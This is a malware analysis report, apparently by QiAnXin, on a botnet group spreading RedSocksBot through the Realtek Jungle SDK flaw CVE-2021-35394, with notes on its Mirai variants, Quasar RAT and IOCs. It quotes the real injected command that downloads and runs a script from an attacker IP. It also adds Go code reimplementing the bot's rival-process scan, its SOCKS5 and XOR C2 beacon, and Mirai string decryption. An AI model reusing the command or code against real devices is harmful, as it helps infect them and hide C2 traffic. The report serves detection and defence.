1. Overview
In early April 2023, QiAnXin Threat Intelligence Center's threat monitoring system detected malware samples of an unknown family spreading through the Realtek Jungle SDK vulnerability CVE-2021-35394. Analysis showed that the samples belong to the same group as RedGoBot, which we disclosed earlier. Correlation analysis confirmed that the group has recently begun hiding its C2 communication behind a SOCKS proxy and is moving its C2 to Tor (.onion) addresses.
In this article, besides the newly discovered botnet samples, we also summarize the other botnets the group has operated recently.
2. Key Behavior Analysis of Samples
The sample spreads through the Realtek Jungle SDK RCE (CVE-2021-35394); the injected command is:
orf;cd /tmp; rm -rf bins.sh; wget http://194.87.197.176/bins/bins.sh; chmod +x bins.sh; sh bins.sh; #
Based on the sample's characteristics and the attribution to this group, we named the botnet RedSocksBot. The latest binary samples support the following CPU architectures:
- x86-64
- PPC
- MIPS
- ARM
- SPC (SPARC)
- 68K
- SuperH
2.1 Killing Other Botnets
The sample walks the Linux virtual file system (/proc) looking for processes that may belong to other botnets and kills them:
It also looks for processes that may be downloaders and kills them:
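As an added example (not code from the samples or from QiAnXin), the following Go program shows the /proc walk such a killer performs: it reads each process's comm and cmdline, matches them against a name list, and returns the matching PIDs while skipping its own process. The two name lists are assumptions for illustration, since the page does not reproduce the bot's real lists, and the program only reports candidates instead of sending SIGKILL.

```go
package main

import (
	"bytes"
	"fmt"
	"os"
	"path/filepath"
	"strconv"
	"strings"
)

// Name fragments the scanner looks for. Both lists are constructed for this
// example; the page does not reproduce the bot's real lists.
var (
	botNames        = []string{"mirai", "gafgyt", "dvrhelper"}
	downloaderNames = []string{"wget", "curl", "tftp"}
)

// procInfo reads /proc/<pid>/comm (executable name, newline-terminated) and
// /proc/<pid>/cmdline (NUL-separated argv, which we join with spaces).
func procInfo(procRoot string, pid int) (comm, cmdline string, err error) {
	dir := filepath.Join(procRoot, strconv.Itoa(pid))
	c, err := os.ReadFile(filepath.Join(dir, "comm"))
	if err != nil {
		return "", "", err
	}
	cl, err := os.ReadFile(filepath.Join(dir, "cmdline"))
	if err != nil {
		return "", "", err
	}
	cl = bytes.ReplaceAll(bytes.TrimRight(cl, "\x00"), []byte{0}, []byte{' '})
	return strings.TrimSpace(string(c)), string(cl), nil
}

// matchesAny is the loose substring match a killer uses: any pattern found
// in either the process name or its full command line counts as a hit.
func matchesAny(comm, cmdline string, patterns []string) bool {
	for _, p := range patterns {
		if strings.Contains(comm, p) || strings.Contains(cmdline, p) {
			return true
		}
	}
	return false
}

// findTargets walks procRoot (normally "/proc"), treats every numeric
// directory as a PID, and returns the PIDs matching patterns. It skips
// selfPid so the scanner never selects its own process, and silently
// skips processes that exit between the directory listing and the read.
func findTargets(procRoot string, patterns []string, selfPid int) ([]int, error) {
	entries, err := os.ReadDir(procRoot)
	if err != nil {
		return nil, err
	}
	pids := []int{}
	for _, e := range entries {
		pid, err := strconv.Atoi(e.Name())
		if err != nil || !e.IsDir() || pid == selfPid {
			continue
		}
		comm, cmdline, err := procInfo(procRoot, pid)
		if err != nil {
			continue
		}
		if matchesAny(comm, cmdline, patterns) {
			pids = append(pids, pid)
		}
	}
	return pids, nil
}

func main() {
	for _, set := range [][]string{botNames, downloaderNames} {
		pids, err := findTargets("/proc", set, os.Getpid())
		if err != nil {
			fmt.Println(err)
			return
		}
		// A bot would syscall.Kill each of these with SIGKILL; we only report.
		fmt.Printf("%v -> %v\n", set, pids)
	}
}
```

Because the match is a plain substring test, a bot that forgets to skip its own PID (or that is itself named like a target) kills itself; the selfPid parameter is the guard Mirai-style killers carry for exactly that reason.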
2.2 Hiding C2 Communication Behind a Proxy
The sample speaks SOCKS5 to a built-in proxy address. The proxy address used in the latest version is:
It selects the SOCKS5 "no authentication required" method, so no password is involved:
RedSocksBot then talks to its hardcoded C2 through the proxy in encrypted form; the data is decrypted with a cyclic (repeating-key) XOR:
In the latest version, the hardcoded C2 has changed to a Tor hidden service (.onion) address:
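As an added example, not code taken from RedSocksBot, the following Go program carries out the exchange described above: a SOCKS5 greeting offering only the no-auth method, a CONNECT to a domain-name destination (so an .onion name is resolved by the proxy, not by the bot's own resolver), and then a beacon protected with a repeating-key XOR. The proxy/C2 side, the key "redsocks" and the destination example.onion are constructed for offline use and are not the bot's real values.

```go
package main

import (
	"fmt"
	"io"
	"net"
)

// xorKey is the key for the cyclic XOR layer. Constructed value: the page
// does not give the bot's real key.
var xorKey = []byte("redsocks")

// xorCycle applies a repeating-key XOR; the same call encrypts and decrypts.
func xorCycle(data, key []byte) []byte {
	out := make([]byte, len(data))
	for i, b := range data {
		out[i] = b ^ key[i%len(key)]
	}
	return out
}

// socks5Connect runs the RFC 1928 client side with the "no authentication
// required" method (0x00) and asks the proxy to CONNECT to host:port. The
// destination is sent as a domain name (ATYP 0x03), so an .onion name is
// resolved by the proxy (e.g. Tor) and never leaks through the bot's DNS.
func socks5Connect(conn io.ReadWriter, host string, port uint16) error {
	if len(host) > 255 {
		return fmt.Errorf("host name too long for SOCKS5: %d bytes", len(host))
	}
	// Greeting: VER=5, NMETHODS=1, METHODS=[0x00 no auth].
	if _, err := conn.Write([]byte{0x05, 0x01, 0x00}); err != nil {
		return err
	}
	sel := make([]byte, 2)
	if _, err := io.ReadFull(conn, sel); err != nil {
		return err
	}
	if sel[0] != 0x05 || sel[1] != 0x00 {
		return fmt.Errorf("proxy did not accept no-auth: % x", sel)
	}
	// Request: VER=5, CMD=1 CONNECT, RSV=0, ATYP=3, LEN, host, port (big-endian).
	req := append([]byte{0x05, 0x01, 0x00, 0x03, byte(len(host))}, host...)
	req = append(req, byte(port>>8), byte(port))
	if _, err := conn.Write(req); err != nil {
		return err
	}
	// Reply: VER, REP, RSV, ATYP, BND.ADDR, BND.PORT; REP must be 0 (succeeded).
	hdr := make([]byte, 4)
	if _, err := io.ReadFull(conn, hdr); err != nil {
		return err
	}
	if hdr[1] != 0x00 {
		return fmt.Errorf("CONNECT failed, REP=%#x", hdr[1])
	}
	addrLen := map[byte]int{0x01: 4, 0x04: 16}[hdr[3]]
	if hdr[3] == 0x03 { // domain name: one length byte precedes the name
		l := make([]byte, 1)
		if _, err := io.ReadFull(conn, l); err != nil {
			return err
		}
		addrLen = int(l[0])
	} else if addrLen == 0 {
		return fmt.Errorf("unknown ATYP %#x", hdr[3])
	}
	_, err := io.ReadFull(conn, make([]byte, addrLen+2)) // drain BND.ADDR + BND.PORT
	return err
}

// fakeProxy is the constructed server side for offline use: it accepts
// no-auth, parses the CONNECT request, reports the destination on dst, then
// plays the C2 by decrypting the bot's message and answering "ack:<msg>".
func fakeProxy(conn net.Conn, dst chan<- string) {
	defer conn.Close()
	io.ReadFull(conn, make([]byte, 3)) // greeting
	conn.Write([]byte{0x05, 0x00})     // method selected: no auth
	hdr := make([]byte, 5)             // VER CMD RSV ATYP LEN
	io.ReadFull(conn, hdr)
	host := make([]byte, int(hdr[4]))
	io.ReadFull(conn, host)
	port := make([]byte, 2)
	io.ReadFull(conn, port)
	dst <- fmt.Sprintf("%s:%d", host, int(port[0])<<8|int(port[1]))
	conn.Write([]byte{0x05, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0, 0}) // REP=0, BND 0.0.0.0:0
	msg := make([]byte, 64)
	n, _ := conn.Read(msg)
	plain := xorCycle(msg[:n], xorKey)
	conn.Write(xorCycle(append([]byte("ack:"), plain...), xorKey))
}

// beacon drives one full exchange over an in-memory pipe and returns the
// destination the proxy was asked for and the decrypted C2 reply.
func beacon(host string, port uint16, payload []byte) (string, string, error) {
	client, server := net.Pipe()
	dst := make(chan string, 1)
	go fakeProxy(server, dst)
	if err := socks5Connect(client, host, port); err != nil {
		return "", "", err
	}
	if _, err := client.Write(xorCycle(payload, xorKey)); err != nil {
		return "", "", err
	}
	resp := make([]byte, 64)
	n, err := client.Read(resp)
	if err != nil {
		return "", "", err
	}
	return <-dst, string(xorCycle(resp[:n], xorKey)), nil
}

func main() {
	fmt.Println(beacon("example.onion", 443, []byte("ping")))
}
```

From the network's point of view the infected device only ever talks to the proxy IP, and the first bytes on the wire are the fixed SOCKS5 handshake (05 01 00 / 05 00 / 05 01 00 03 ...), which is the pattern to hunt for on hosts that have no business using a SOCKS proxy; the repeating-key XOR adds no real confidentiality, since a known plaintext of key length recovers the key.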
2.3 DDoS Methods
The latest version of RedSocksBot supports six DDoS attack methods:
- udp_bypass
- openvpn
- openvpn2
- tcp_stomp
- tcp_syn
- tcp_ack
3. Arsenal
3.1 mirai_redbot
The group is well versed in the open-source Mirai code base. During analysis we found that it operates several modified Mirai builds. Besides the usual changes (a new encryption key and a modified check-in packet), one build replaces the XOR decryption with AES and later gained a SOCKS proxy; we named it mirai_redbot.
Its main feature is replacing Mirai's XOR string decryption with AES decryption taken from tiny-AES-c, the open-source, portable AES implementation on GitHub.
Stock Mirai decrypts its configuration table with XOR:
mirai_redbot uses tiny-AES-c from GitHub instead:
The group also modified the check-in packet, as shown in one of the versions below:
In later versions the developer added a SOCKS proxy feature:
During the same updates the C2 was also changed to a .onion address:
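To make the difference concrete, here is an added Go example (not the group's code and not tiny-AES-c itself) that reproduces stock Mirai's table decryption from the public source (toggle_obf() in table.c with table_key 0xdeadbeef) next to an AES-128-CBC decrypt built on Go's crypto/aes, standing in for tiny-AES-c's AES_CBC_decrypt_buffer(). The CBC mode, zero padding, key and IV are assumptions: the page does not state which tiny-AES-c mode mirai_redbot uses.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

// miraiTableKey is table_key in the public Mirai source (table.c).
const miraiTableKey uint32 = 0xdeadbeef

// miraiToggle reproduces toggle_obf(): each byte is XORed in turn with the
// four key bytes k1..k4. XOR is associative, so the four passes collapse to
// a single XOR with k1^k2^k3^k4 and the 32-bit "key" is effectively one byte.
func miraiToggle(val []byte, key uint32) []byte {
	k1, k2, k3, k4 := byte(key), byte(key>>8), byte(key>>16), byte(key>>24)
	out := make([]byte, len(val))
	for i, b := range val {
		out[i] = b ^ k1 ^ k2 ^ k3 ^ k4
	}
	return out
}

// effectiveMiraiKey is the single byte the table XOR really uses; for the
// public key 0xdeadbeef it is 0x22, which is why Mirai strings fall to a
// 256-candidate brute force.
func effectiveMiraiKey(key uint32) byte {
	return byte(key) ^ byte(key>>8) ^ byte(key>>16) ^ byte(key>>24)
}

// aesCBCEncrypt and aesCBCDecrypt stand in for tiny-AES-c's
// AES_CBC_encrypt_buffer / AES_CBC_decrypt_buffer: AES-128, CBC, a
// caller-supplied IV and no padding scheme of their own (the buffer must be
// a whole number of 16-byte blocks). Zero padding is our assumption here.
func aesCBCEncrypt(key, iv, plain []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(iv) != aes.BlockSize {
		return nil, fmt.Errorf("iv must be %d bytes", aes.BlockSize)
	}
	pad := (aes.BlockSize - len(plain)%aes.BlockSize) % aes.BlockSize
	buf := append(append([]byte{}, plain...), make([]byte, pad)...)
	out := make([]byte, len(buf))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, buf)
	return out, nil
}

func aesCBCDecrypt(key, iv, ct []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(iv) != aes.BlockSize {
		return nil, fmt.Errorf("iv must be %d bytes", aes.BlockSize)
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("ciphertext length %d is not a multiple of %d", len(ct), aes.BlockSize)
	}
	out := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, ct)
	return bytes.TrimRight(out, "\x00"), nil // strip the zero padding
}

func main() {
	// "\x22\x35" is the TABLE_CNC_PORT entry in the public Mirai table.c;
	// it decodes to 0x0017, i.e. port 23.
	fmt.Printf("effective key %#x, port bytes % x\n",
		effectiveMiraiKey(miraiTableKey), miraiToggle([]byte{0x22, 0x35}, miraiTableKey))
	key, iv := []byte("0123456789abcdef"), []byte("fedcba9876543210") // constructed
	ct, _ := aesCBCEncrypt(key, iv, []byte("cnc.example"))
	pt, _ := aesCBCDecrypt(key, iv, ct)
	fmt.Printf("AES-CBC: %d-byte ciphertext -> %q\n", len(ct), pt)
}
```

For an analyst the practical consequence is that a mirai_redbot configuration can no longer be recovered by trying 256 XOR keys; the 16-byte AES key and the IV have to be pulled from the binary (tiny-AES-c keeps them as plain arguments to AES_init_ctx_iv(), so they sit in .rodata or are built on the stack right before the call).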
3.2 Quasar RAT
Besides deploying botnets on Linux systems, the group has also been seen distributing a backdoor on Windows. The backdoor is an obfuscated C# program which analysis confirmed to be Quasar RAT.
This suggests that the group is involved in illicit activity beyond botnets.
3.3 RedGoBot
We also found that the group keeps updating RedGoBot; the new version is built with Go 1.19.
The new version slightly changed the directory used when killing processes, from "/var/run/" to "/var".
The group also cut the number of weak password combinations used in its Telnet brute force from 64 to 2, possibly to lower the brute-force failure rate and so avoid detection or blocking:
A bot update command was added, but it is not implemented yet:
4. Conclusion
Analysis of the group's arsenal and recent updates shows that it intends to add SOCKS proxies to its bots and to gradually move its C2 domains to .onion addresses in order to reduce the chance of detection. Besides botnets, the group is also involved in other illicit activity. We will continue to monitor it.
5. IOCs
RedSocksBot:
MD5:
EC866BF75A575580672C4D119986562A
E9AABD9B63DA5295ABE7623DE1653D8D
49890121A8154D1EFA0472ED72696AE2
1D3F6F716C74B1810936CD6442295AC6
C2:
158.247.223.97:443
141.164.45.139:443
139.162.76.15:443
vs2bfkss7uyv2vtvsuyxc23za327zcufannp4twbirvupap2fahifwyd.onion
mirai_redbot:
MD5:
4c51359ac1c7422083f7799eace7f8e6
C2:
broilerchickensrs.boats
gxgvoh5yljp2v2hvyiztzjhhuveaygcejp54y5gts2dnntdjexrkm2ad.onion
RedGoBot:
MD5:
9e44f040eba9b582b532fd952c7c8fd6
39a70e21e46c846b5d604ad1ef7178c0
C2:
cat-gen.cf
bot.ustress.app
62.77.157.220:6001
Quasar RAT:
MD5:
14aeb4447d6ad9d7efca5e88854261e7
C2:
mictobozo.duckdns.org